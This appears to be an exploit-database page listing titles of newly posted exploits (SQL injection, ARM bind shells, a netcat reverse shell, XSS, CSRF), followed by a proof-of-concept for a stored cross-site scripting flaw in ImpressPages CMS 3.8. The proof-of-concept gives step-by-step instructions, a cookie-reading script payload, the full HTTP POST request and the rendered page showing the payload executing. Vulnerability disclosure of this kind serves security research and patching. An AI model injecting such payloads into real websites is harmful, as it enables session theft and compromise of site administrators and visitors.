
16 new exploits Banner Exchange Script 1.0 - (targetid) Blind SQL Injection Vulnerability PHP 5.3.3 - ibase_gen_id() off-by-one Overflow Vulnerability ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address ARM Bindshell port 0x1337 ARM Bind Connect UDP Port 68 ARM Loader Port 0x1337 ARM ifconfig eth0 and Assign Address G Data TotalCare 2011 - NtOpenKey Race Condition Vulnerability ImpressPages CMS 3.8 - Stored XSS Vulnerability Seagate BlackArmor NAS sg2000-2000.1331 - Cross-Site Request Forgery Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability Linux Netcat Reverse Shell - 32bit - 77 bytes PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter XSS Getsimple CMS 3.3.10 - Arbitrary File Upload op5 v7.1.9 Configuration Command Execution op5 7.1.9 - Configuration Command Execution Alibaba Clone B2B Script - Arbitrary File Disclosure XuezhuLi FileSharing - Directory Traversal XuezhuLi FileSharing - (Add User) CSRF FinderView - Multiple Vulnerabilities
61 lines
2.2 KiB
Text
Executable file
61 lines
2.2 KiB
Text
Executable file
###########################################################
|
||
[~] Exploit Title:stored vulnerability
|
||
[~] Author: sajith
|
||
[~] version: ImpressPages CMS v3.8
|
||
[~] vulnerable app link:http://www.impresspages.org/download/
|
||
###########################################################
|
||
|
||
|
||
steps:
|
||
|
||
1) log into the admin panel
|
||
http://127.0.0.1/cms/ImpressPages/?cms_action=manage
|
||
|
||
2)click on advanced tab >> in the button title field enter the payload
|
||
"><img src=x onerror=prompt(document.cookie);>
|
||
|
||
|
||
request:
|
||
|
||
POST /cms/ImpressPages/?cms_action=manage HTTP/1.1
|
||
Host: 127.0.0.1
|
||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
|
||
Firefox/14.0.1
|
||
Accept: application/json, text/javascript, */*; q=0.01
|
||
Accept-Language: en-us,en;q=0.5
|
||
Accept-Encoding: gzip, deflate
|
||
Proxy-Connection: keep-alive
|
||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||
X-Requested-With: XMLHttpRequest
|
||
Referer: http://127.0.0.1/cms/ImpressPages/?cms_action=manage
|
||
Content-Length: 538
|
||
Cookie: ses11565=2v920trpg7sl8aghg3aj297su5
|
||
Pragma: no-cache
|
||
Cache-Control: no-cache
|
||
|
||
g=standard&m=content_management&a=savePageOptions&securityToken=4496a2385a44fe257b857f04a3240f53&pageOptions%5BbuttonTitle%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(document.cookie)%3B%3E+&pageOptions%5Bvisible%5D=1&pageOptions%5BcreatedOn%5D=2009-08-08&pageOptions%5BlastModified%5D=2012-01-21&pageOptions%5BpageTitle%5D=Home&pageOptions%5Bkeywords%5D=&pageOptions%5Bdescription%5D=&pageOptions%5Burl%5D=home&pageOptions%5Btype%5D=default&pageOptions%5BredirectURL%5D=&pageOptions%5Brss%5D=0&pageOptions%5Blayout%5D=home.php&revisionId=91
|
||
|
||
|
||
3) refresh the page and we can see that the payload gets executed.
|
||
|
||
|
||
|
||
|
||
</head>
|
||
<body class="manage" >
|
||
|
||
<div class="theme clearfix">
|
||
<header class="clearfix col_12">
|
||
<div class="logo ipModuleInlineManagement ipmLogo "
|
||
data-cssclass=''>
|
||
<a href="http://127.0.0.1/cms/ImpressPages/en/?cms_action=manage"
|
||
style=" ">
|
||
xyz.com </a>
|
||
</div>
|
||
|
||
<div class="right">
|
||
<span class="currentPage">"><img src=x
|
||
onerror=prompt(document.cookie);> </span>
|
||
<a href="#" class="topmenuToggle"> </a>
|
||
<div class="topmenu">
|
||
<ul class="level1">
|